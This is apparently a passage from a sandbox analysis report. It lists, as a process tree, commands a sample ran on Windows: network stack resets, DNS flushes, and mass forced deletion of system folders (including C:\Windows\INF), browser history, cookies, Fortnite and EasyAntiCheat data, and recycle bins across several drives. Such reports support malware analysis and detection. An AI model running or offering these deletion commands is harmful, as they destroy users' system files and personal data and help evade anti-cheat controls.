      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int reset all
    3⤵
    PID:6052
  - - C:\Windows\system32\netsh.exe
      netsh int reset all
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ipv4 reset
    3⤵
    PID:5840
  - - C:\Windows\system32\netsh.exe
      netsh int ipv4 reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:5632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ipv6 reset
    3⤵
    PID:5292
  - - C:\Windows\system32\netsh.exe
      netsh int ipv6 reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /release
    3⤵
    PID:5632
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /renew
    3⤵
    PID:5552
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /renew
      4⤵
      Gathers network information
      PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    3⤵
    PID:5348
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:5512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\Public\Documents
    3⤵
    PID:5288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch
    3⤵
    PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp
    3⤵
    PID:5436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch
    3⤵
    PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:5460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:5604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:6124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:5792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:5920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\Intel
    3⤵
    PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:5256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\INF
    3⤵
    PID:5604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\Public\Documents
    3⤵
    PID:6124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\Prefetch
    3⤵
    PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\temp
    3⤵
    PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\Prefetch
    3⤵
    PID:5328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:5928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:5588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q D:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q D:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:6052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\Intel
    3⤵
    PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:5260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\INF
    3⤵
    PID:5628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\Public\Documents
    3⤵
    PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\Prefetch
    3⤵
    PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\temp
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:5964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\Prefetch
    3⤵
    PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q E:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q E:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:5840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:5168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q E:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q E:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:5260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:5628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\Intel
    3⤵
    PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\INF
    3⤵
    PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\Public\Documents
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\Prefetch
    3⤵
    PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\temp
    3⤵
    PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\Prefetch
    3⤵
    PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q F:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q F:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:5636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:5864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q F:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q F:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\Intel
    3⤵
    PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s %systemdrive%\$Recycle.Bin >nul 2>&1
    3⤵
    PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s d:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s e:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s f:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    - Drops file in Windows directory
    PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:5812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:5160
- - C:\Windows\system32\cmd.exe
